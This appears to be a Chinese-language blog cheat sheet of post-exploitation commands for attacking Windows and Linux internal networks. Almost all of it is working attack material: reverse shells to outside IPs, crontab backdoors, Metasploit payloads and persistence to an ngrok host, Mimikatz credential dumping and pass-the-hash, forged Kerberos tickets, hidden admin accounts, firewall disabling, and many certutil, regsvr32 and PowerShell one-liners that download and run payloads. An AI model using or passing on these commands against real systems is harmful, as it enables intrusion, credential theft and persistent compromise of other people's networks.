内网合集
内网信息收集
在网络安全行业或者计算机相关行业都涉及命令行界面(CLI)的相关操作,命令行相比大家熟悉的图形化界面(GUI)更快捷、更高效。现在收集了部分指令。
windows cmd&powershell
query user || qwinsta 查看当前在线用户
net user 查看本机用户
net user /domain 查看域用户
net view & net group "domain computers" /domain 查看当前域计算机列表 第二个查的更多
net view /domain 查看有几个域
net view \\dc 查看 dc 域内共享文件
net group /domain 查看域里面的组
net group "domain admins" /domain 查看域管
net localgroup administrators /domain /这个也是查域管,是升级为域控时,本地账户也成为域管
net group "domain controllers" /domain 域控
net time /domain
net config workstation 当前登录域 - 计算机名 - 用户名
net use \\域控(如pc.xx.com) password /user:xxx.com\username 相当于这个帐号登录域内主机,可访问资源
ipconfig
systeminfo
tasklist /svc
tasklist /S ip /U domain\username /P /V 查看远程计算机 tasklist
net localgroup administrators && whoami 查看当前是不是属于管理组
netstat -ano
nltest /dclist:xx 查看域控
whoami /all 查看 Mandatory Label uac 级别和 sid 号
net sessoin 查看远程连接 session (需要管理权限)
net share 共享目录
cmdkey /l 查看保存登陆凭证
echo %logonserver% 查看登陆域
spn –l administrator spn 记录
set 环境变量
dsquery server - 查找目录中的 AD DC/LDS 实例
dsquery user - 查找目录中的用户
dsquery computer 查询所有计算机名称 windows 2003
dir /s *.exe 查找指定目录下及子目录下没隐藏文件
arp -a
查看3389开放:
netstat -ano
Tasklist /svc
添加用户:
net user 123 123 /add
删除用户:
Net user 123 /del
加入管理员组:
net localgroup administrators 123 /add
利用注册表开3389端口:
reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fSingleSessionPerUser /t REG_DWORD /d 0 /f
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
利用注册表关3389端口
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 00000001 /f
如果系统未配置过远程桌面服务,第一次开启时还需要添加防火墙规则,允许 3389 端口:
netsh advfirewall firewall add rule name="Remote Desktop" protocol=TCP dir=in localport=3389 action=allow
关防火墙:
netsh firewall set opmode disable
netsh firewall set opmode mode=disable
隐藏win用户:
开启sys权限的cmd:
`IEX(New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Exfiltration/Invoke-TokenManipulation.ps1');Invoke-TokenManipulation -CreateProcess 'cmd.exe' -Username 'nt authority\system'`
添加用户并隐藏:
IEX(New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/3gstudent/Windows-User-Clone/master/Windows-User-Clone.ps1')
Windows 系统的帐户隐藏:
https://3gstudent.github.io/3gstudent.github.io/%E6%B8%97%E9%80%8F%E6%8A%80%E5%B7%A7-Windows%E7%B3%BB%E7%BB%9F%E7%9A%84%E5%B8%90%E6%88%B7%E9%9A%90%E8%97%8F/
windows 的 RDP 连接记录:
http://rcoil.me/2018/05/%E5%85%B3%E4%BA%8Ewindows%E7%9A%84RDP%E8%BF%9E%E6%8E%A5%E8%AE%B0%E5%BD%95/
Linux bash:
bash -i >& /dev/tcp/10.0.0.1/8080 0>&1
bash -i 交互的 shell
& 标准错误输出到标准输出
/dev/tcp/10.0.0.1/8080 建立 socket ip port
0>&1 标准输入到标准输出
(crontab -l;echo '/60 * * * * exec 9<> /dev/tcp/IP/port;exec 0<&9;exec 1>&9 2>&1;/bin/bash --noprofile -i')|crontab -
猥琐版
(crontab -l;printf "/60 * * * * exec 9<> /dev/tcp/IP/PORT;exec 0<&9;exec 1>&9 2>&1;/bin/bash --noprofile -i;\rno crontab for whoami%100c\n")|crontab -
详细介绍
https://github.com/tom0li/security_circle/blob/master/15288418585142.md
Mysql 数据库提权:
sqlmap.py -d mysql://root:password1234@192.168.0.6:3306/information_schema --sql-shell
ew正向代理:
ew -s ssocksd -l 1080
反向代理:
攻击机器:Ew -s rcsocks -l 1080 -e 2333 即被攻击机连接本机 2333 端口,转发到本机的 1080 端口,访问本机的 1080 端口,相当访问被攻击机的 2333
被攻击机器:ew -s rssocks -d 192.168.1.100 -e 2333
打开proxychains:
/etc/proxychains.conf
端口转发:
将被攻击机的3389端口转发到8888
lcx.exe -slave 139.1.2.3 8888 10.48.128.25 3389
提权:
win 提权辅助工具,原理主要通过 systeminfo 补丁信息比对漏洞库, 工具链接
https://github.com/GDSSecurity/Windows-Exploit-Suggester/
linux 提权辅助
https://github.com/jondonas/linux-exploit-suggester-2
windows-kernel-exploits Windows 平台提权漏洞集合
https://github.com/SecWiki/windows-kernel-exploits
linux-kernel-exploits Linux 平台提权漏洞集合
https://github.com/SecWiki/linux-kernel-exploits
Msf
linux 相关 payload:
linux/x86/meterpreter/reverse_tcp
linux/x86/meterpreter/bind_tcp
linux/x86/shell_bind_tcp
linux/x86/shell_reverse_tcp
linux/x64/shell/bind_tcp
linux/x64/shell/reverse_tcp
linux/x64/shell_bind_tcp
linux/x64/shell_bind_tcp_random_port
linux/x64/shell_reverse_tcp
windows 相关 payload:
windows/meterpreter/reverse_tcp
windows/meterpreter/bind_tcp
windows/meterpreter/reverse_hop_http
windows/meterpreter/reverse_http
windows/meterpreter/reverse_http_proxy_pstore
windows/meterpreter/reverse_https
windows/meterpreter/reverse_https_proxy
windows/shell_reverse_tcp
windows/shell_bind_tcp
windows/x64/meterpreter/reverse_tcp
windows/x64/meterpreter/bind_tcp
windows/x64/shell_reverse_tcp
windows/x64/shell_bind_tcp
反弹 shell:
msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST= LPORT= -f exe > shell.exe
nc -e cmd.exe ip port
监听:
windows/meterpreter/reverse_tcp
windows/shell_reverse_tcp
meterpreter 下上传 :
upload file
download file
Msf 进程注入:
getuid
getpid
Ps
migrate 676
Msf hash:
run hashdump sys
run post/windows/gather/smart_hashdump 需要 sys 权限
search bypassuac
Msf 的持续后门:
run persistence -h 用于创建启动项启动,会创建注册表,创建文件。
run persistence -U -i 10 -p 10390 -r free.ngrok.cc
Msf powershell:
load powershell
powershell_shell
IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1');
Invoke-Mimikatz -DumpCreds
Hash传递:
mimikatz "privilege::debug" "sekurlsa::pth /user:administrator /domain:system /ntlm:3b1cc1bbc10104cc9ec412fab33581d7" exit
MS17-010:
background
use auxiliary/scanner/smb/ smb_ms17_010
set rhosts 172.17.0.0/24
set threads 50
建立IPC$:
Net use i: \192.168.1.1\c$ pass /u:admin
开通ipc$:
Net use \192.168.1.1\ipc$
Mimikatz:
Privilege::debug
Sekurlsa::logonpasswords
Mimikatz注册表:
reg save HKLM\SYSTEM SYSTEM
reg save HKLM\SAM SAM
lsadump::sam /sam:SAM /system:SYSTEM
mimikatz + procdump 获得内存 hash:
procdump.exe -accepteula -ma lsass.exe lsass.dmp(管理权限)
lsass.dmp 放到 mimikatz.exe 同目录
mimikatz.exe "sekurlsa::minidump lsass.dmp" "log" "sekurlsa::logonpasswords"
导出当前
mimikatz.exe "privilege::debug" "log" "sekurlsa::logonpasswords"
powershell "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds"
Windows Server 2012, 部分 Windows Server 2008 默认无法使用 mimikatz 导出明文口令
解决方法:启用 Wdigest Auth, cmd:
reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1 /f
powershell:
Set-ItemProperty -Path HKLM:\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest -Name UseLogonCredential -Type DWORD -Value 1
Msf+mimikatz传递hash:
exploit/windows/smb/psexec
Set smbuser
Set smbpass
Set rhost
ms14-068 Kerberos 漏洞利用:
生成 TGT:用于伪造
whoami /all 获得:用户@ 域名、用户 sid、域主机
python ms14068.py -u admin@xxx.com -p password -s sid -d dc.xxx.com
ms14068.exe -u admin@xxx.com -p password -s sid -d dc.xxx.com
会生成 TGT_admin@xxx.com.ccache
注入 TGT:
klist
klist purge 清除所有凭证,等一会在执行下列命令
写入内存:
mimikatz.exe "kerberos::ptc c:\TGT_admin@xxx.com.ccache"
若成功
dir \dc.xxx.com\c$
net user admin xxxxx@password /add /domain
net group "Domain Admins" admin /add /domain
Psexec:
在对方电脑上运行程序
psexec \192.168.100.2 -u administrator -p 123456 -d -s calc
运行calc后返回,对方计算机上会有一个calc进程,是以系统身份运行的,因为calc前面是-s(system的意思)。窗口对方是看不到的,如果需要对方看到这个窗口,需要加参数-i
psexec \192.168.100.2 -u administrator -p 123456 -d calc
承上,就以当前身份运行calc,然后返回
psexec \192.168.100.2 -u administrator -p 123456 -i -d cmd /c start http:// www.baidu.com
为对方以当前用户身份打开百度网页,并让他看到这个网页,在对方电脑上运行cmd命令,且不让对方看到这个窗口
psexec \192.168.100.2 -u administrator -p 123456 -s cmd
RDP爆破:
dir /a %userprofile%\AppData\Local\Microsoft\Credentials*
dpapi::cred /in:C:\Users\dell\AppData\Local\Microsoft\Credentials\3B98DB2BC774365C2C3C6B8490D0BCD1
sekurlsa::dpapi
dpapi::cred /in:C:\Users\administrator\AppData\Local\Microsoft\Credentials\3B98DB2BC774365C2C3C6B8490D0BCD1 /masterkey:6efae56547ada268846aa2c4cb3709a4a541418f382b25de4f4b5736f5b86b6fdc1b92fe28670e34a89c4fbdfa6a8d7a9e6dac289547b4f5b5c6154a144ddbca
计划任务:
at 22:44 /interactive cmd /c C:\Users\ss\Desktop\beacon.exe
schtasks.exe
schtasks /query /s Reskit16 /fo csv /nh >> svr01data asklogsp0102.csv
Cmd执行远程下载:
bitsadmin命令(只能命令下载到指定路径上,win7以上):
①bitsadmin /transfer myDownLoadJob /download /priority normal "http://img5.cache.netease.com/photo/0001/2013-03-28/8R1BK3QO3R710001.jpg" "d:\abc.jpg"
②bitsadmin /transfer d90f http://site.com/a %APPDATA%\d90f.exe&%APPDATA%\d90f.exe&del %APPDATA%\d90f.exe
powershell命名下载执行:(win7以上)
①powershell (new-object System.Net.WebClient).DownloadFile('http://192.168.1.1/1.exe','C:\test\1.exe');start-process 'C:\test\1.exe'
②cmd.exe /c powershell.exe (new-object System.Net.WebClient).downloadfile('http://172.16.8.6','beacon.exe')
rundll32命令下载执行:
①rundll32 \webdavserver\folder\payload.dll,entrypoint
②rundll32.exe javascript:"..\mshtml,RunHTMLApplication";o=GetObject("script:http://webserver/payload.sct");window.close();
net中的regasm命令下载执行
①C:\Windows\Microsoft.NET\Framework64\v4.0.30319\regasm.exe /u \webdavserver\folder\payload.dll
cmd的远程命令下载:
cmd.exe /k < \webdavserver\folder\batchfile.txt
regsvr32命令下载执行
①regsvr32 /u /n /s /i:http://webserver/payload.sct scrobj.dll
②regsvr32 /u /n /s /i:\webdavserver\folder\payload.sct scrobj.dll
③regsvr32 /u /s /i:http://site.com/js.png scrobj.dll
certutil命令下载执行
①Certutil -urlcache -split -f http://192.168.160.87/beacon.exe
②certutil -urlcache -split -f http://webserver/payload.b64 payload.b64 & certutil -decode payload.b64 payload.dll & C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil /logfile= /LogToConsole=false /u payload.dll
③certutil -urlcache -split -f http://webserver/payload.b64 payload.b64 & certutil -decode payload.b64 payload.exe & payload.exe
④certutil -urlcache -split -f http://site.com/a a.exe && a.exe && del a.exe && certutil -urlcache -split -f http://192.168.254.102:80/a delete
odbcconf命令下载执行:
①odbcconf /s /a {regsvr \webdavserver\folder\payload_dll.txt}
cscript脚本远程命令下载执行
①cscript //E:jscript \webdavserver\folder\payload.txt
查看文件md5:
certutil -hashfile filename MD5
certutil -hashfile filename SHA1
certutil -hashfile filename SHA256
Ipc爆破:
Search smb_login
Set user_file
Set pass_file
Set rhost
建立ipc丢个马上去
At计划任务执行或者可以使用模块:psexec_command
Set rhost
Set smbuser
Set smbpass
Set command c:/beacon.exe
Powershell:
获取sid:Get-WmiObject -Class Win32_UserAccount
获取rdp远程连接记录: dir "Registry::HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers" -Name
查看保存的wifi密码:
netsh wlan show profile
netsh wlan show profile “PROFILE_NAME” key=clear
regeorg:
本地运行:python reGeorgSocksProxy.py -p 8080 -u http: //www.XXX.com/tunnel.jsp
本地代理配置:socks5 127.0.0.1 8888
浙公网安备 33010602011771号